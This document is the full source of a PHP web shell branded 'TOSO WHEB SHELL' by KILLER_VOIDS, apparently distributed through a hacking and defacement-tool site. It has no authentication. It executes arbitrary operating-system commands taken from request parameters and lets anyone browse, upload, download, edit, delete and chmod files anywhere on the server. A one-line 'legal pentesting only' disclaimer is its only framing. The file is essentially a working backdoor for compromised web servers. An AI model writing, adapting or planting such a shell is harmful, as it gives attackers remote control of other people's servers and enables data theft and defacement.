<!--
--  Uploaded on : https://haxor.my.id/open/tosowebshell-php.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<?php
/**
 * KILLER VOIDS PHP WEB SHELL
 * ============================
 * Fitur: File Manager, Command Exec, Key Generator, Upload, Download
 * Author: KILLER_VOIDS
 * Version: 3.0
 * 
 * WARNING: Untuk keperluan PENTESTING LEGAL saja!
 */

// ==================== KONFIGURASI ====================
$shell_title = "TOSO WHEB SHELL";
$shell_version = "3.0";
$shell_author = "KILLER_VOIDS - TOSO WEB SHELL";

// ==================== FUNGSI UTAMA ====================

function executeCommand($cmd) {
    $output = '';
    if (function_exists('system')) {
        ob_start();
        system($cmd);
        $output = ob_get_clean();
    } elseif (function_exists('exec')) {
        exec($cmd, $out);
        $output = implode("\n", $out);
    } elseif (function_exists('shell_exec')) {
        $output = shell_exec($cmd);
    } elseif (function_exists('passthru')) {
        ob_start();
        passthru($cmd);
        $output = ob_get_clean();
    } else {
        $output = "Command execution disabled.";
    }
    return $output;
}

function formatSize($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $i = 0;
    while ($size >= 1024 && $i < 4) {
        $size /= 1024;
        $i++;
    }
    return round($size, 2) . ' ' . $units[$i];
}

function getFileList($dir) {
    $files = [];
    if (is_dir($dir)) {
        $scan = scandir($dir);
        foreach ($scan as $item) {
            if ($item == '.' || $item == '..') continue;
            $path = $dir . '/' . $item;
            $files[] = [
                'name' => $item,
                'path' => $path,
                'type' => is_dir($path) ? 'dir' : 'file',
                'size' => is_file($path) ? filesize($path) : 0,
                'size_human' => is_file($path) ? formatSize(filesize($path)) : '-',
                'perm' => substr(sprintf('%o', fileperms($path)), -4),
                'modified' => date('Y-m-d H:i:s', filemtime($path))
            ];
        }
    }
    usort($files, function($a, $b) {
        if ($a['type'] == $b['type']) return strcasecmp($a['name'], $b['name']);
        return ($a['type'] == 'dir') ? -1 : 1;
    });
    return $files;
}

function generateKey($length = 32) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $key = '';
    for ($i = 0; $i < $length; $i++) {
        $key .= $characters[random_int(0, strlen($characters) - 1)];
    }
    return $key;
}

// ==================== HANDLE REQUEST ====================
$current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : (isset($_GET['cmd']) ? $_GET['cmd'] : '');
$cmd_output = '';
$message = '';
$generated_key = '';

// Execute command
if ($cmd) {
    $cmd_output = executeCommand($cmd);
}

// Generate key
if (isset($_POST['generate_key'])) {
    $key_length = isset($_POST['key_length']) ? (int)$_POST['key_length'] : 32;
    $generated_key = generateKey($key_length);
    $message = "✅ Key generated successfully!";
}

// Handle file upload
if (isset($_POST['upload'])) {
    $target = $current_dir . '/' . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        $message = "✅ Upload success: " . $_FILES['file']['name'];
    } else {
        $message = "❌ Upload failed!";
    }
}

// Handle file delete
if (isset($_GET['delete'])) {
    $file = $_GET['delete'];
    if (file_exists($file) && is_file($file)) {
        unlink($file);
        $message = "✅ Deleted: " . basename($file);
    } elseif (is_dir($file)) {
        rmdir($file);
        $message = "✅ Directory deleted: " . basename($file);
    }
}

// Handle file edit
if (isset($_POST['save_file'])) {
    $file = $_POST['file_path'];
    $content = $_POST['file_content'];
    if (file_put_contents($file, $content)) {
        $message = "✅ File saved: " . basename($file);
    }
}

// Handle file create
if (isset($_POST['create_file'])) {
    $file = $current_dir . '/' . $_POST['filename'];
    if (!file_exists($file)) {
        file_put_contents($file, $_POST['file_content'] ?? '');
        $message = "✅ File created: " . $_POST['filename'];
    }
}

// Handle directory create
if (isset($_POST['create_dir'])) {
    $dir = $current_dir . '/' . $_POST['dirname'];
    if (!file_exists($dir)) {
        mkdir($dir, 0755, true);
        $message = "✅ Directory created: " . $_POST['dirname'];
    }
}

// Handle download
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// Handle copy
if (isset($_POST['copy_file'])) {
    $src = $_POST['copy_source'];
    $dst = $current_dir . '/' . $_POST['copy_dest'];
    if (file_exists($src)) {
        copy($src, $dst);
        $message = "✅ Copied: " . basename($src) . " -> " . $_POST['copy_dest'];
    }
}

// Handle move
if (isset($_POST['move_file'])) {
    $src = $_POST['move_source'];
    $dst = $current_dir . '/' . $_POST['move_dest'];
    if (file_exists($src)) {
        rename($src, $dst);
        $message = "✅ Moved: " . basename($src) . " -> " . $_POST['move_dest'];
    }
}

// Handle chmod
if (isset($_POST['chmod_file'])) {
    $file = $_POST['chmod_target'];
    $perm = intval($_POST['chmod_perm'], 8);
    if (file_exists($file)) {
        chmod($file, $perm);
        $message = "✅ Permission changed: " . basename($file) . " to " . $_POST['chmod_perm'];
    }
}

// Get file list
$files = getFileList($current_dir);

// Get system info
$sys_info = [
    'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A',
    'php_version' => phpversion(),
    'user' => get_current_user(),
    'os' => php_uname(),
    'memory_limit' => ini_get('memory_limit'),
    'upload_max' => ini_get('upload_max_filesize')
];

$edit_file = isset($_GET['edit']) ? $_GET['edit'] : null;
$file_content = $edit_file && file_exists($edit_file) ? file_get_contents($edit_file) : '';
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?= $shell_title ?> v<?= $shell_version ?></title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; font-family: monospace; }
        body { background: #0a0e14; color: #c0caf5; padding: 20px; }
        .container { max-width: 1400px; margin: 0 auto; }
        
        /* Banner */
        .banner {
            background: #1a1b26;
            border: 3px solid #f7768e;
            padding: 20px;
            margin-bottom: 20px;
            text-align: center;
            border-radius: 10px;
            box-shadow: 0 0 30px rgba(247,118,142,0.3);
        }
        .glitch {
            font-size: 2rem;
            font-weight: bold;
            color: #bb9af7;
            text-shadow: 2px 2px 0 #f7768e;
            animation: glitch 1s infinite;
        }
        @keyframes glitch {
            0% { transform: translate(0); }
            20% { transform: translate(-2px, 2px); }
            40% { transform: translate(-2px, -2px); }
            60% { transform: translate(2px, 2px); }
            80% { transform: translate(2px, -2px); }
            100% { transform: translate(0); }
        }
        
        /* Info bar */
        .info-bar {
            background: #1a1b26;
            border: 1px solid #3b4261;
            border-radius: 8px;
            padding: 15px;
            margin-bottom: 20px;
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 10px;
        }
        .info-card {
            background: #24283b;
            padding: 10px;
            border-radius: 6px;
        }
        .info-card strong { color: #bb9af7; }
        
        /* Message */
        .message {
            background: #283457;
            border-left: 5px solid #9d7cd8;
            padding: 10px;
            margin-bottom: 20px;
            border-radius: 4px;
        }
        
        /* Navigation */
        .nav-bar {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 15px;
            margin-bottom: 20px;
            display: flex;
            flex-wrap: wrap;
            gap: 10px;
            align-items: center;
            border-radius: 8px;
        }
        .path {
            flex: 3;
            background: #24283b;
            padding: 10px;
            color: #7dcfff;
            word-break: break-all;
            border-radius: 4px;
        }
        .btn {
            background: #2f354a;
            border: 1px solid #414868;
            color: #c0caf5;
            padding: 8px 15px;
            cursor: pointer;
            text-decoration: none;
            border-radius: 4px;
            transition: 0.2s;
            display: inline-block;
        }
        .btn:hover { background: #3b4261; border-color: #7aa2f7; }
        .btn-primary { background: #7aa2f7; border-color: #7aa2f7; color: #1a1b26; }
        .btn-success { background: #9ece6a; border-color: #9ece6a; color: #1a1b26; }
        
        /* File Table */
        .file-table {
            background: #1a1b26;
            border: 1px solid #3b4261;
            margin-bottom: 20px;
            overflow-x: auto;
            border-radius: 8px;
        }
        .table-header {
            background: #24283b;
            padding: 12px;
            display: grid;
            grid-template-columns: 3fr 1fr 1fr 2fr 2fr;
            gap: 10px;
            font-weight: bold;
            color: #bb9af7;
            border-bottom: 1px solid #3b4261;
        }
        .table-row {
            padding: 10px 12px;
            display: grid;
            grid-template-columns: 3fr 1fr 1fr 2fr 2fr;
            gap: 10px;
            align-items: center;
            border-bottom: 1px solid #2f354a;
        }
        .table-row:hover { background: #24283b; }
        .dir-icon { color: #7dcfff; }
        .file-actions { display: flex; gap: 5px; flex-wrap: wrap; }
        .action-btn {
            background: transparent;
            border: 1px solid #414868;
            color: #c0caf5;
            padding: 4px 8px;
            cursor: pointer;
            text-decoration: none;
            font-size: 0.75rem;
            border-radius: 3px;
        }
        .action-btn.edit:hover { background: #7aa2f7; color: #1a1b26; }
        .action-btn.delete:hover { background: #f7768e; color: #1a1b26; }
        
        /* Command Box */
        .cmd-box {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 20px;
            margin-bottom: 20px;
            border-radius: 8px;
        }
        .cmd-input { display: flex; gap: 10px; margin-bottom: 15px; }
        .cmd-input input { flex: 1; background: #24283b; border: 1px solid #414868; color: #c0caf5; padding: 10px; border-radius: 4px; }
        .cmd-output { background: #0f1117; border: 1px solid #414868; padding: 15px; color: #9ece6a; max-height: 300px; overflow-y: auto; white-space: pre-wrap; border-radius: 4px; }
        
        /* Upload Box */
        .upload-box {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 20px;
            margin-bottom: 20px;
            border-radius: 8px;
        }
        .upload-form { display: flex; gap: 10px; flex-wrap: wrap; }
        .upload-form input[type="file"] { background: #24283b; border: 1px solid #414868; color: #c0caf5; padding: 10px; flex: 2; border-radius: 4px; }
        
        /* Key Generator */
        .key-box {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 20px;
            margin-bottom: 20px;
            border-radius: 8px;
        }
        .key-display {
            background: #0f1117;
            border: 1px solid #414868;
            padding: 15px;
            font-family: monospace;
            font-size: 1.1rem;
            color: #9ece6a;
            word-break: break-all;
            border-radius: 4px;
            margin-top: 10px;
        }
        
        /* Tools Grid */
        .tools-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 15px;
            margin-bottom: 20px;
        }
        .tool-card {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 15px;
            border-radius: 8px;
        }
        .tool-card h4 {
            color: #bb9af7;
            margin-bottom: 10px;
            border-bottom: 1px solid #3b4261;
            padding-bottom: 5px;
        }
        .tool-card input, .tool-card select {
            background: #24283b;
            border: 1px solid #414868;
            color: #c0caf5;
            padding: 8px;
            margin: 5px 0;
            width: 100%;
            border-radius: 4px;
        }
        
        /* Editor */
        .editor-box {
            background: #1a1b26;
            border: 1px solid #3b4261;
            padding: 20px;
            margin-bottom: 20px;
            border-radius: 8px;
        }
        .editor-box textarea { width: 100%; min-height: 300px; background: #0f1117; border: 1px solid #414868; color: #9ece6a; padding: 15px; margin-bottom: 15px; border-radius: 4px; }
        
        @media (max-width: 768px) {
            .table-header { display: none; }
            .table-row { grid-template-columns: 1fr; gap: 5px; }
            .file-actions { justify-content: flex-start; }
        }
    </style>
</head>
<body>
<div class="container">
    <!-- BANNER -->
    <div class="banner">
        <div class="glitch"><?= $shell_title ?></div>
        <div style="color: #7aa2f7;">v<?= $shell_version ?> | <?= $shell_author ?> 🔥</div>
        <div style="color: #9ece6a; font-size: 0.8rem;">Wednesday by Unknown</div>
    </div>
    
    <!-- SYSTEM INFO -->
    <div class="info-bar">
        <div class="info-card"><strong>Host:</strong> <?= $_SERVER['HTTP_HOST'] ?? 'N/A' ?></div>
        <div class="info-card"><strong>Server Address:</strong> <?= $_SERVER['SERVER_ADDR'] ?? 'N/A' ?></div>
        <div class="info-card"><strong>PHP:</strong> <?= $sys_info['php_version'] ?></div>
        <div class="info-card"><strong>OS:</strong> <?= $sys_info['os'] ?></div>
    </div>
    
    <?php if ($message): ?>
    <div class="message"><?= $message ?></div>
    <?php endif; ?>
    
    <!-- NAVIGATION -->
    <div class="nav-bar">
        <div class="path">📁 <?= htmlspecialchars($current_dir) ?></div>
        <a href="?dir=<?= urlencode(dirname($current_dir)) ?>" class="btn">⬆️ Up</a>
        <a href="?dir=<?= urlencode(getcwd()) ?>" class="btn">🏠 Home</a>
        <a href="?dir=<?= urlencode($current_dir) ?>" class="btn">🔄 Refresh</a>
    </div>
    
    <!-- FILE EXPLORER -->
    <div class="file-table">
        <div class="table-header">
            <div>Name</div>
            <div>Size</div>
            <div>Perm</div>
            <div>Modified</div>
            <div>Actions</div>
        </div>
        <?php foreach ($files as $file): ?>
        <div class="table-row">
            <div>
                <?php if ($file['type'] == 'dir'): ?>
                    <span class="dir-icon">📁</span>
                    <a href="?dir=<?= urlencode($file['path']) ?>" style="color:#7dcfff; text-decoration:none;"><?= htmlspecialchars($file['name']) ?></a>
                <?php else: ?>
                    <span>📄</span>
                    <span style="color:#9ece6a;"><?= htmlspecialchars($file['name']) ?></span>
                <?php endif; ?>
            </div>
            <div><?= $file['size_human'] ?></div>
            <div><?= $file['perm'] ?></div>
            <div><?= $file['modified'] ?></div>
            <div class="file-actions">
                <?php if ($file['type'] == 'file'): ?>
                    <a href="?edit=<?= urlencode($file['path']) ?>&dir=<?= urlencode($current_dir) ?>" class="action-btn edit">Edit</a>
                    <a href="?delete=<?= urlencode($file['path']) ?>&dir=<?= urlencode($current_dir) ?>" class="action-btn delete" onclick="return confirm('Delete?')">Del</a>
                    <a href="?download=<?= urlencode($file['path']) ?>" class="action-btn">DL</a>
                <?php else: ?>
                    <a href="?dir=<?= urlencode($file['path']) ?>" class="action-btn">Open</a>
                <?php endif; ?>
            </div>
        </div>
        <?php endforeach; ?>
    </div>
    
    <!-- COMMAND EXECUTION -->
    <div class="cmd-box">
        <h3 style="color:#bb9af7; margin-bottom:15px;">⌨️ Command Execution</h3>
        <form method="POST">
            <div class="cmd-input">
                <input type="text" name="cmd" placeholder="whoami, ls -la, id, pwd" value="<?= htmlspecialchars($cmd) ?>">
                <input type="submit" value="Execute" class="btn btn-primary">
            </div>
        </form>
        <?php if ($cmd_output): ?>
        <div class="cmd-output"><pre><?= htmlspecialchars($cmd_output) ?></pre></div>
        <?php endif; ?>
    </div>
    
    <!-- KEY GENERATOR -->
    <div class="key-box">
        <h3 style="color:#bb9af7; margin-bottom:15px;">🔑 Key Generator</h3>
        <form method="POST">
            <div style="display: flex; gap: 10px; align-items: center; flex-wrap: wrap;">
                <span>Key Length:</span>
                <select name="key_length" style="background:#24283b; border:1px solid #414868; color:#c0caf5; padding:8px;">
                    <?php for ($i = 8; $i <= 64; $i += 8): ?>
                    <option value="<?= $i ?>" <?= $i == 32 ? 'selected' : '' ?>><?= $i ?> bytes</option>
                    <?php endfor; ?>
                </select>
                <input type="submit" name="generate_key" value="Generate Key" class="btn btn-success">
            </div>
        </form>
        <?php if ($generated_key): ?>
        <div class="key-display">
            <strong>🔑 Generated Key:</strong><br>
            <?= $generated_key ?>
        </div>
        <?php endif; ?>
        
        <!-- Key list (0x01 - 0x436) -->
        <div style="margin-top: 15px;">
            <button class="btn" id="showKeysBtn" onclick="toggleKeys()">📋 Show Key List (0x01 - 0x436)</button>
            <div id="keyList" style="display: none; margin-top: 10px; background: #0f1117; padding: 10px; border-radius: 4px; max-height: 200px; overflow-y: auto;">
                <script>
                function toggleKeys() {
                    var keyList = document.getElementById('keyList');
                    if (keyList.style.display === 'none') {
                        keyList.style.display = 'block';
                        document.getElementById('showKeysBtn').innerHTML = '📋 Hide Key List';
                    } else {
                        keyList.style.display = 'none';
                        document.getElementById('showKeysBtn').innerHTML = '📋 Show Key List (0x01 - 0x436)';
                    }
                }
                </script>
                <?php
                for ($i = 1; $i <= 1078; $i++) {
                    $hex = str_pad(dechex($i), 2, '0', STR_PAD_LEFT);
                    echo "<span style='color:#9ece6a;'>Key: 0x$hex</span><br>";
                }
                ?>
            </div>
        </div>
    </div>
    
    <!-- FILE UPLOAD -->
    <div class="upload-box">
        <h3 style="color:#bb9af7; margin-bottom:15px;">📤 File Upload</h3>
        <form method="POST" enctype="multipart/form-data" class="upload-form">
            <input type="file" name="file" required>
            <input type="submit" name="upload" value="Upload" class="btn btn-primary">
        </form>
    </div>
    
    <!-- TOOLS GRID -->
    <div class="tools-grid">
        <!-- Create File -->
        <div class="tool-card">
            <h4>📄 Create File</h4>
            <form method="POST">
                <input type="text" name="filename" placeholder="filename.php">
                <textarea name="file_content" placeholder="File content..." style="width:100%; background:#0f1117; border:1px solid #414868; color:#9ece6a; padding:8px; margin:5px 0; height:80px;"></textarea>
                <input type="submit" name="create_file" value="Create File" class="btn btn-primary" style="width:100%;">
            </form>
        </div>
        
        <!-- Create Directory -->
        <div class="tool-card">
            <h4>📁 Create Directory</h4>
            <form method="POST">
                <input type="text" name="dirname" placeholder="new_directory">
                <input type="submit" name="create_dir" value="Create Directory" class="btn btn-primary" style="width:100%;">
            </form>
        </div>
        
        <!-- Copy File -->
        <div class="tool-card">
            <h4>📋 Copy File</h4>
            <form method="POST">
                <input type="text" name="copy_source" placeholder="Source file path">
                <input type="text" name="copy_dest" placeholder="Destination name">
                <input type="submit" name="copy_file" value="Copy File" class="btn btn-primary" style="width:100%;">
            </form>
        </div>
        
        <!-- Move File -->
        <div class="tool-card">
            <h4>🚚 Move/Rename File</h4>
            <form method="POST">
                <input type="text" name="move_source" placeholder="Current name">
                <input type="text" name="move_dest" placeholder="New name">
                <input type="submit" name="move_file" value="Move/Rename" class="btn btn-primary" style="width:100%;">
            </form>
        </div>
        
        <!-- Change Permission -->
        <div class="tool-card">
            <h4>🔐 Change Permission</h4>
            <form method="POST">
                <input type="text" name="chmod_target" placeholder="File/Directory path">
                <input type="text" name="chmod_perm" placeholder="Permission (e.g., 755, 644)">
                <input type="submit" name="chmod_file" value="Chmod" class="btn btn-primary" style="width:100%;">
            </form>
        </div>
        
        <!-- System Info -->
        <div class="tool-card">
            <h4>💻 System Info</h4>
            <p><strong>Server:</strong> <?= $sys_info['server'] ?></p>
            <p><strong>PHP:</strong> <?= $sys_info['php_version'] ?></p>
            <p><strong>User:</strong> <?= $sys_info['user'] ?></p>
            <p><strong>Memory Limit:</strong> <?= $sys_info['memory_limit'] ?></p>
            <p><strong>Upload Max:</strong> <?= $sys_info['upload_max'] ?></p>
        </div>
    </div>
    
    <!-- FILE EDITOR -->
    <?php if ($edit_file): ?>
    <div class="editor-box">
        <h3 style="color:#bb9af7;">✏️ Editing: <?= basename($edit_file) ?></h3>
        <form method="POST">
            <input type="hidden" name="file_path" value="<?= htmlspecialchars($edit_file) ?>">
            <textarea name="file_content"><?= htmlspecialchars($file_content) ?></textarea>
            <input type="submit" name="save_file" value="Save File" class="btn btn-primary">
            <a href="?dir=<?= urlencode($current_dir) ?>" class="btn">Cancel</a>
        </form>
    </div>
    <?php endif; ?>
    
    <!-- FOOTER -->
    <div style="text-align: center; padding: 20px; color: #565f89; border-top: 1px dashed #3b4261;">
        <p><?= $shell_title ?> v<?= $shell_version ?> | By <?= $shell_author ?> 🔥</p>
        <p>Current Path: <?= htmlspecialchars($current_dir) ?></p>
    </div>
</div>
</body>
</html>